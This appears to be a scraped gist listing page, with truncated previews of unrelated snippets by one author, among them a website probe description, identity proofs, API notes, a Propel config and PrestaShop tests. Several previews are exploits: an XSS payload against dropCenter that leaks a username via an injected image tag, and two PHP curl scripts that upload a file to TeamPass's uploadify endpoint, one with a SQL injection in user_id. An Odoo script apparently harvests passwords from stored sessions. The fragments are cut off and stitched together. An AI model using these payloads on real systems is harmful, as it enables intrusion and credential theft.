Cette sonde permet de vérifier des sites web :
- vérification du HTTP Status Code (2xx)
- vérification de la présence d'un terme dans la page
- vérification du temps de chargement
Verifying that +leblanc_simon is my blockchain ID. https://onename.com/leblanc_simon |
<?php | |
# Exploit Title: dropCenter all version : privilege escalation | |
# If this is the last version (after 2013-08-20), use permanent XSS to hack the website : | |
# | |
# - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
# | |
# - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
# | |
# Date: 2013-08-02 | |
# Author: leviathan |
<?php | |
/* | |
Usage of API : | |
- Search / Get links : | |
* method: GET | |
* URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search) | |
* return: JSON (object or array) | |
* &key=[linkdate]: |
#!/usr/bin/python | |
import os | |
from werkzeug.contrib.sessions import FilesystemSessionStore | |
session_store = FilesystemSessionStore(os.path.expanduser('~/.local/share/Odoo/sessions')) | |
passwds = [] | |
for sid in session_store.list(): | |
session = session_store.get(sid) |
from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict | |
prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6') | |
prestashop.search('addresses') # 401 + 200 : OK, it's the first call | |
prestashop.get('addresses', 4) # 200 only: OK | |
prestashop.get('addresses', 6) # 200 only: OK | |
prestashop.search('orders') # 401 + 200 : NOK, it must be only 200 | |
prestashop.get('orders', 2) # 200 only: OK | |
prestashop.get('orders', 5) # 200 only: OK |
<?php | |
$url = 'http://localhost/teampass/'; | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\'')); | |
curl_setopt($curl, CURLOPT_POST, true); | |
$post = array( | |
'Filedata' => '@info.php', | |
'type_upload' => 'import_items_from_csv', | |
'folder' => '/teampass/files', |
<?php | |
$url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/'; | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php'); | |
curl_setopt($curl, CURLOPT_POST, true); | |
$post = array( | |
'Filedata' => '@info.php', | |
'type_upload' => 'import_items_from_csv', | |
'folder' => '/nilsteampassnet-TeamPass-65f3167/files', |
# Project name | |
propel.project = OpenSondage | |
# Database driver | |
propel.database = mysql | |
propel.mysql.tableType = MyISAM | |
propel.mysql.tableEngineKeyword = ENGINE | |
propel.tablePrefix = | |
################################################# |
I hereby claim:
To claim this, I am signing this object: